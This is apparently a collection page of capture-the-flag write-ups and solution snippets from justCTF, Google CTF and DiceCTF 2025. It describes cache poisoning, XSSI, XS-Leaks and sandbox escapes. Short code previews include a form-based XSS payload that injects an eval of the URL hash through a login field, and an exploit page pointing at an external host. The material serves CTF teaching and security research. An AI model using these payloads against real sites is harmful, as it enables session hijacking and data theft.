From justCTF2025
A super secure application generated by the overlords for our positive players. Don't overthink it—it's not too hard—but try to think outside the box!
Vibe coding is the future. Good luck and have fun!
Busy Traffic | writeup by @terjanq
justCTF 2025
The challenge consisted of three components: Traefik v3.4.5 proxy, a Simple Cache plugin for Traefik, and an admin bot that adds a flag to local storage on the challenge domain. The intended solution combined cache poisoning and request splitting to build an arbitrary XSS payload from the available assets.
Google CTF 2025
Postviewer challenges have become a highlight of the Web category of Google CTF, and this year featured yet another continuation of the series—Postviewer v5². There were two versions of the same challenge; the core challenge was for Chrome, and the other was for Firefox, called Postviewer v5² (FF).
This year, I intended the core challenge to be difficult, and this was indeed the case, given that only two teams managed to retrieve the flag: justCatTheFish and Friendly Maltese Citizens.
| <script src="http://localhost:1338/static/safe-frame.js"></script> | |
| <script src="http://localhost:1338/static/util.js"></script> | |
| <!-- http://34.44.166.247/exploit-eolldodkgm9 --> | |
| <script> | |
| const RELOAD_TIME = 150; | |
| const SMALL_DELAY = 2; | |
| const MSG_DELAY = 80; | |
| const MSG_INTERVAL = 3000; |
Google CTF 2025
Players were given a simple puppeteer bot that visits any URL provided by the players.
The flag was stored as file:///flag.txt so the goal was to leak this file somehow
The intended solution was to leak the flag file through an XSSI with help of
| // This is a solution to misc/convenience-store challenge from DiceCTF 2025. | |
| // It was solved by 7 teams. | |
| // | |
| // TL;DR Timing XS-Leak from an Android app using custom tabs | |
| package com.dicectf2025quals.attackerapp | |
| import android.content.ComponentName | |
| import android.os.Bundle | |
| import androidx.activity.ComponentActivity | |
| import androidx.activity.enableEdgeToEdge |
As it always have been with my challenges for Google CTF, they are based on real bugs I found internally. This year is a bit different though. This time the bugs were crafted by no other than me myself. One bug didn't manage to reach the production and the other is still present in prod making it effectively a 0day!
Both of my challenges (Postviewer v3 & Game Arcade) for this year are related to a sandboxing I've been working since the first postviewer challenge. You can read a little bit about it in
This year I created a copycat challenge of another-csp from DiceCTF Quals 2024. It was only solved by 1 team, DiceGang. Although the challenge looked almost identical, the solutions should be strictly different.
The intended solution of the original challenge was to leak one bit of information per admin visit based on crashing the browser renderer process with malicious CSS. (The below snippet was crashing the browser, but currently it's fixed)
| <iframe name="xxx"></iframe> | |
| <form method=POST target=xxx action="https://ctftime.pl/login"> | |
| <input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'> | |
| <input name="password" value="123"> | |
| </form> | |
| <script> | |
| (async () =>{ | |
| const sleep = d => new Promise(r=>setTimeout(r,d)); |
| <!-- | |
| This was a sandboxing challenge where the JS language is presenteded in the form of exotic, made-up language. | |
| It's almost properly sandboxed but there is one bug that players needed to find. | |
| The bug I found was to construct HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon | |
| and then to concat array expression with variable name, like $var$['eval']. To get reference to eval we used DOM clobbering | |
| and defined <iframe name=$win$> | |
| --> | |
| <iframe name=$win$></iframe> | |
| <x-program> |